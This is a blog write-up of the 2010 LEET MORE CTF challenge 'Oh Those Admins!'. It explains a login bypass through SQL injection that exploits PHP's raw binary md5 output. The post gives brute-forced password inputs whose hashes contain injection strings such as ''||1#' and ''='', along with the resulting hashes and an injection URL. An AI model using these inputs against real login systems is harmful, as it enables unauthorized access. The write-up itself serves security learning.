Saturday, September 11, 2010

LEET MORE CTF 2010 write up - Oh Those Admins!

This challenge is SQL injection. The line of problem is (I cannot remember the exact column and table name)
$r = mysql_query("SELECT login FROM admin WHERE password='" . md5($_GET['password'], true) . "'");
Normally, web sites keep the password hash as hex string. But this challenge keep raw hash (binary 16 bytes) in database. Binary can be string. So To bypass login, the output of md5 has to look like
' or 1=1#
The above string is what I thought first. But it is too long. To make the brute forcing fast, the required output string should be short. After checking from MySQL doc, I could make it shorter. Here is the list what I found
'or 1#    <== no need for space after single quote, any non-zero number is TRUE
'||1#     <== || is same as OR, no need for space after ||
Before writing the code for brute forcing, I remembered I can put non-printable characters in password using '%XX'. So 1 byte can be 256 values. No charset.

My code for brute forcing is http://pastebin.com/2xMG9rKi.

Ran it about 20 minutes on my slow windows pc, then got it.

password: 34b854c8
password: %34%b8%54%c8
result: c13e807082277c7c36231ed0dd34a863
result: ม>€p‚'||6# ะ4จc

Note: on linux, compile with "gcc -O2 -lssl -o prog prog.c" Note: If you want to see result from my program quick, run it with "./prog 4 4 200"

Submit it from url bar
url?password=%34%b8%54%c8
,then got the real admin hash. It is "071CC0720D0ABD73F61A291224F248D6". But I could not reverse admin hash :( so poor me. When searched in google, I found it in hashkiller but it was not solved.

Below is not my solution

Before finished this post, I found other 2 writeups of this challenge. Very nice solutions. They found shorter SQL injection string.

First is http://cvk.posterous.com/sql-injection-with-raw-md5-hashes. The SQL injection string is
'||'
Here is the modification of my code: http://pastebin.com/ThxBESPs. Got the result in a few minutes.
password: 2c55c819
password: %2c%55%c8%19
result: 3157e727097c7c27342e7dc2729f75ed
result: 1W็'    ||'4.}ยrŸuํ
Second is http://blog.nibbles.fr/?p=2039. The SQL injection string is
'='
Here is the modification of my code: http://pastebin.com/w5E54PNz. Got the result in a second.
password: 22a80f
password: %22%a8%0f
result: 047f1f9ed77f467a273d279d8e521422
result:   žืFz'='ŽR "

No comments:

Post a Comment